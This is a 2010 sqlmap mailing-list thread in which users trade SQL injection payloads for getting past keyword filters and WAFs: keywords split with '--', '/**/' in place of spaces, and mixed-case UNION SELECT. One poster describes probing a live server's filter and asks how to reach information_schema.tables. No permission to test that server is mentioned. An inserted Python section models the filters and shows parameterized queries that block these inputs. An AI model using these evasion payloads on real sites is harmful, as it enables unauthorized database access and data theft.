Thread: [sqlmap-users] How to avoid union filter?
From: Pagera <nem...@gm...> - 2010-04-22 01:54:58
Hello,

Is there any way to avoid a server filter, like filtering of union or select in the URL?

Because sqlmap doesn't seem to work when there is filtering.

Thanks

From: Pagera <pag...@gm...> - 2010-04-22 15:58:53
Hello,

Is there any way to avoid a server filter, like filtering of union or select in the URL?

Because sqlmap doesn't seem to work when there is filtering.

Thanks

From: David G. <sk...@gm...> - 2010-04-22 16:12:35
What type of filter is used? Does it remove certain words and then execute the query, or does it simply not run anything at all?

I've come across a filter that removed certain words from parameters passed by users, such as UNION, SELECT, DROP, ALTER, UPDATE, and comments like "--" or "/*".

To get around it, I used this:

http://www.site.com/vuln.php?id=323 UN--ION A--LL SELE--CT 1,2,3 FRO--M table

The query was filtered 1x and resulted in the following expression:

http://www.site.com/vuln.php?id=323 UNION ALL SELECT 1,2,3 FROM table

Hope this helps. =)

On Thu, Apr 22, 2010 at 2:01 PM, Pagera <pag...@gm...> wrote:
> Hello,
>
> Is there any way to avoid a server filter, like filtering of union or select
> in the URL?
>
> Because sqlmap doesn't seem to work when there is filtering.
>
> Thanks

--
David Gomes Guimarães

From: Ignacio H. <nac...@gm...> - 2010-04-22 16:21:53
Sometimes you can bypass a badly implemented IDS/WAF that looks for specific words like "union", "select" or "from", as David says, in other ways, for example:

http://www.site.com/vuln.php?id=323/**/union/**/all/**/select/**/...
(replacing spaces with /**/)

or:

http://www.site.com/vuln.php?id=323 UnIoN aLl SeLeCt...
(randomly uppercase/lowercase keywords; some IDS/WAFs only look for "union" or "UNION" but not for "UnIoN")

Also, I think the sqlmap developers are working on more sophisticated bypass techniques.

2010/4/22 David Guimaraes <sk...@gm...>
> What type of filter is used? Does it remove certain words and then execute the
> query, or does it simply not run anything at all?
>
> I've come across a filter that removed certain words from parameters passed
> by users, such as UNION, SELECT, DROP, ALTER, UPDATE, and comments like "--"
> or "/*".
>
> To get around it, I used this:
>
> http://www.site.com/vuln.php?id=323 UN--ION A--LL SELE--CT 1,2,3 FRO--M table
>
> The query was filtered 1x and resulted in the following expression:
>
> http://www.site.com/vuln.php?id=323 UNION ALL SELECT 1,2,3 FROM table
>
> Hope this helps. =)
>
> On Thu, Apr 22, 2010 at 2:01 PM, Pagera <pag...@gm...> wrote:
>
>> Hello,
>>
>> Is there any way to avoid a server filter, like filtering of union or select
>> in the URL?
>>
>> Because sqlmap doesn't seem to work when there is filtering.
>>
>> Thanks
>
> --
> David Gomes Guimarães

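The filter behaviours described in the two replies above, modelled as an added example (not code from the thread or from sqlmap), to show why keyword blocklists miss the inputs quoted there while typed validation plus a bound parameter rejects all of them. The functions `strip_once`, `exact_case_match`, `spaced_phrase_match` and `lookup`, and the `items` table with its row, are constructed for illustration.

```python
import re
import sqlite3

# Constructed models of the filters discussed in the thread, not any real WAF.
STRIP = re.compile(r"UNION|SELECT|DROP|ALTER|UPDATE|--|/\*")
SIGNATURES = ("union", "UNION", "select", "SELECT")  # exact-case word list

def strip_once(value):
    """Remove blocked tokens in one pass; the result is never re-checked."""
    return STRIP.sub("", value)

def exact_case_match(value):
    """Flag input only if a keyword appears in one of the listed spellings."""
    return any(sig in value for sig in SIGNATURES)

def spaced_phrase_match(value):
    """Flag input only if the keywords are separated by literal spaces."""
    return "union all select" in value.lower()

def lookup(conn, raw_id):
    """Hardened handler: typed validation plus a bound parameter."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a decimal integer")
    return conn.execute("SELECT name FROM items WHERE id = ?", (int(raw_id),)).fetchall()

# Parameter values quoted in the thread (the id= part of each URL).
SPLIT = "323 UN--ION A--LL SELE--CT 1,2,3 FRO--M table"
MIXED = "323 UnIoN aLl SeLeCt..."
COMMENTED = "323/**/union/**/all/**/select/**/..."

def audit():
    conn = sqlite3.connect(":memory:")
    # Constructed table and row, used only to exercise lookup().
    conn.executescript("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT); INSERT INTO items VALUES (323, 'widget');")
    rejected = 0
    for value in (SPLIT, MIXED, COMMENTED):
        try:
            lookup(conn, value)
        except ValueError:
            rejected += 1
    return {
        "strip_once_output": strip_once(SPLIT),        # keywords reassembled
        "mixed_case_flagged": exact_case_match(MIXED),
        "commented_flagged": spaced_phrase_match(COMMENTED),
        "hardened_rejected": rejected,                 # out of 3 inputs
        "hardened_valid": lookup(conn, "323"),
    }

if __name__ == "__main__":
    print(audit())
```

The hardened handler never inspects keywords at all: the parameter is accepted only as a decimal integer and is passed to the database as data, so the filter's word list stops being a security boundary.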
From: Malek T. <pag...@gm...> - 2010-04-25 22:31:26
Hello,

The type of filter is:

The server is filtering for something like information_schema.tables; it's filtered.
@@version() is filtered, but version() is not.
user() is not filtered; I could get the user name and the db name.
database() is not filtered.
select is filtered, but I could bypass it by putting the comment /**/ before and after select, and it worked.

But I couldn't get the table names because of the filtering of information_schema.tables.

I couldn't recognize how this filter works.

So is there any way to bypass something like information_schema.tables?

I used CHAR() like CHAR(69,6e,66,6f,72,6d,61,74,69,6f,6e,5f,73,63,68,65,6d,61,2e,74,61,62,6c,65,73) but it didn't work either.

2010/4/22 Ignacio Hernández <nac...@gm...>
> Sometimes you can bypass a badly implemented IDS/WAF that looks for
> specific words like "union", "select" or "from", as David says, in other
> ways, for example:
> http://www.site.com/vuln.php?id=323/**/union/**/all/**/select/**/...
> (replacing spaces with /**/)
> or:
> http://www.site.com/vuln.php?id=323 UnIoN aLl SeLeCt... (randomly
> uppercase/lowercase keywords; some IDS/WAFs only look for "union" or
> "UNION" but not for "UnIoN")
>
> Also, I think the sqlmap developers are working on more sophisticated
> bypass techniques.
>
> 2010/4/22 David Guimaraes <sk...@gm...>
>
>> What type of filter is used? Does it remove certain words and then execute the
>> query, or does it simply not run anything at all?
>>
>> I've come across a filter that removed certain words from parameters passed
>> by users, such as UNION, SELECT, DROP, ALTER, UPDATE, and comments like "--"
>> or "/*".
>>
>> To get around it, I used this:
>>
>> http://www.site.com/vuln.php?id=323 UN--ION A--LL SELE--CT 1,2,3 FRO--M table
>>
>> The query was filtered 1x and resulted in the following expression:
>>
>> http://www.site.com/vuln.php?id=323 UNION ALL SELECT 1,2,3 FROM table
>>
>> Hope this helps. =)
>>
>> On Thu, Apr 22, 2010 at 2:01 PM, Pagera <pag...@gm...> wrote:
>>
>>> Hello,
>>>
>>> Is there any way to avoid a server filter, like filtering of union or select
>>> in the URL?
>>>
>>> Because sqlmap doesn't seem to work when there is filtering.
>>>
>>> Thanks
>>
>> --
>> David Gomes Guimarães